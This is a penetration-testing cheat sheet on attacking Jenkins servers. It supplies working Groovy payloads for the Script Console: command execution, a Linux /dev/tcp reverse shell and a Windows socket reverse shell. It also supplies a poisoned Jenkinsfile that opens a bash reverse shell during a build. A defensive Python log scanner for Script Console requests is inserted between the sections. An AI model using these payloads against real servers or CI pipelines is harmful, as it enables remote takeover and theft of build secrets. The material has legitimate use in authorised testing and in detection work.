# Jenkins

Jenkins is an open-source automation server written in Java that helps developers build and test their software projects continuously. It is a server-based system that runs in servlet containers such as Tomcat.

## Attacks

### Jenkins Application

Once we have gained access to a Jenkins application, a quick way of achieving command execution on the underlying server is via the Script Console (`/script`). The Script Console allows us to run arbitrary Apache Groovy scripts within the Jenkins controller runtime. Groovy is an object-oriented, Java-compatible language. Groovy source code is compiled into Java bytecode and can run on any platform that has a JRE installed.

{% code title="WebShell" overflow="wrap" %}

```groovy
def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout
```

{% endcode %}

{% code title="LinuxRevShell" overflow="wrap" %}

```groovy
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

{% endcode %}

{% code title="WindowsRevShell" overflow="wrap" %}

```groovy
String host="<IP>";
int port=<PORT>;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

{% endcode %}
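For the defender's side of the Script Console paragraph above, the following added example (not part of the original page) scans reverse-proxy access logs for requests that reached the console endpoints and classifies them for triage. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from collections import defaultdict

# /script is the path named above; /scriptText, /computer/<node>/script and the
# /manage/ prefix are other Jenkins routes to the same console. One optional
# context-path segment (e.g. /jenkins) may precede them.
CONSOLE = re.compile(
    r"^(?:/[^/]+)??(?:/manage)?(?:/computer/[^/]+)?/script(?:Text)?/?$")
# Assumption: a reverse proxy in front of Jenkins writes combined-format logs.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def console_hits(lines):
    """Return one dict per request that addressed a Script Console path."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # malformed or non-HTTP line
        path = m["target"].split("?", 1)[0]
        if not CONSOLE.match(path):
            continue
        method, status = m["method"], int(m["status"])
        if method == "POST" and status == 200:
            verdict = "executed"   # a script was submitted and accepted
        elif status in (401, 403):
            verdict = "denied"     # rejected by authn/authz or the CSRF check
        elif method == "GET" and status == 200:
            verdict = "viewed"     # console form rendered, nothing run
        else:
            verdict = "other"      # redirects, errors: review manually
        hits.append({"ip": m["ip"], "ts": m["ts"], "path": path, "verdict": verdict})
    return hits

def summarize(hits):
    """Count verdicts per source address for triage."""
    counts = defaultdict(lambda: defaultdict(int))
    for h in hits:
        counts[h["ip"]][h["verdict"]] += 1
    return {ip: dict(v) for ip, v in counts.items()}

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /script HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2024:10:01:40 +0000] "POST /script HTTP/1.1" 200 6011 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2024:10:05:00 +0000] "POST /jenkins/scriptText HTTP/1.1" 403 612 "-" "curl/8.0"',
    '198.51.100.9 - - [12/Mar/2024:10:06:00 +0000] "GET /scriptApproval/ HTTP/1.1" 200 900 "-" "curl/8.0"',
    '192.0.2.44 - - [12/Mar/2024:10:07:00 +0000] "POST /computer/agent-1/script?x=1 HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
]
```

Calling `summarize(console_hits(SAMPLE))` groups the four console requests by source address; the `/scriptApproval/` line is ignored because it is a different endpoint.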

### Poisoning the Pipeline

Being able to modify the `Jenkinsfile` (for example, in a Git repository) is not enough on its own; we also need to find out how the build is started. Jenkins might be configured to run only on manual intervention; if this is the case, we need to keep exploring. It might also be configured to execute the pipeline routinely, in which case we won't know how it is triggered until it executes. However, Jenkins might also be configured to run the build on each change to the repository. This is typically done by having the SCM server call a *webhook* for specific triggers. We can check in the settings whether the repository contains any configuration that will execute a pipeline on certain actions.

{% code overflow="wrap" %}

```groovy
pipeline {
  agent any
  stages {
    stage('Build') {
      steps {
        // withAWS(region: 'us-east-1', credentials: 'aws_key') {   // AWS in env
        script {
          if (isUnix()) {
            // <COMMAND_GROOVY>
            sh 'bash -c "bash -i >& /dev/tcp/<IP>/<PORT> 0>&1" & '
          }
        }
        // }
      }
    }
  }
}
```

{% endcode %}
